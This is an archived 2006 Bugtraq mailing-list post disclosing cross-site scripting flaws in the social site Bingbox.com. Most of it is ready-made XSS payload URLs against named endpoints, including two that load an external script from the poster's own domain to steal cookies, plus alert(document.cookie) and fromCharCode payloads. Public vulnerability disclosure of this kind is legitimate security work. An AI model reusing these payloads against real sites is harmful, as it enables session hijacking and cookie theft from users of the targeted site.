| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060616063739.28595.qmail@securityfocus.com> Date: 16 Jun 2006 06:37:39 -0000 From: luny@...fucktard.com To: bugtraq@...urityfocus.com Subject: Bingbox.com - XSS & cookie disclosure Bingbox.com Homepage: http://www.bingbox.com Affected files: * Profile input boxes: - City input * Registering * Viewing Birthdays * Adding a friend * Viewing people online ----------------------------------------------- XSS with cookie disclosure via inviting friends: http://www.bingbox.com/go/admin/f=friends&o=invite&a=msn&t=web&wizard=start">">">">">'>'>'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"< "<"<'<'<' XSS vuln with cookie disclosure via "City" input box on profile: Data isnt properly sanatized before being generated. In one part of the site its output as full code on the screen (tested using <img> tags, with <table> tags, no code displays), and on the other part, an XSS can occur: For a PoC, since they add backslashes to ' and ", use the long UTF-8 Unicode for ': <TABLE BACKGROUND=javascript:alert('XSS')> For the cookie: <TABLE BACKGROUND=javascript:alert(document.cookie)> -------------------------------------------------- XSS with cookie disclosure when viewing a blog, that redirects you to the register page: http://bingbox.com/go/register/wanted=luny666/">">">">">">'>'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<'<'<"<" ----------------------------------------------- XSS via viewing birthdays: http://www.bingbox.com/go/birthdays/month=8&day=13">'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<"">< "<" ------------------------------------------------- XSS when adding a new friend. Same as above, we arent able to use ' or long UTF-8 unicode above, so we use fromCharCode's. PoC: http://www.bingbox.com/go/admin/f=friends&o=new&friendname=DreamUnik">'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83)) ><"<"<"<"<'<'<'<"<""><"<" -------------------------------------------------- XSS vuln when viewing people online: http://www.bingbox.com/go/whoisonline/i=1&agemin=&agemax=&country=US">'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83)) ><"<"<"<"<'<'<'<"<""><"<"&locationarea=&sex=&page=3 ------------------------------------------------ More XSS vulns: http://www.bingbox.com/go/static/file=av">'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<"">< http://www.bingbox.com/go/static/file=ps">'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<"">< http://www.bingbox.com/go/static/file=gedragscode">'>'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<"">< Screenshots: http://www.youfucktard.com/xsp/bingbox1.jpg http://www.youfucktard.com/xsp/bingbox2.jpg http://www.youfucktard.com/xsp/bingbox3.jpg http://www.youfucktard.com/xsp/bingbox4.jpg http://www.youfucktard.com/xsp/bingbox5.jpg http://www.youfucktard.com/xsp/bingbox6.jpg http://www.youfucktard.com/xsp/bingbox7.jpg http://www.youfucktard.com/xsp/bingbox8.jpg
Powered by blists - more mailing lists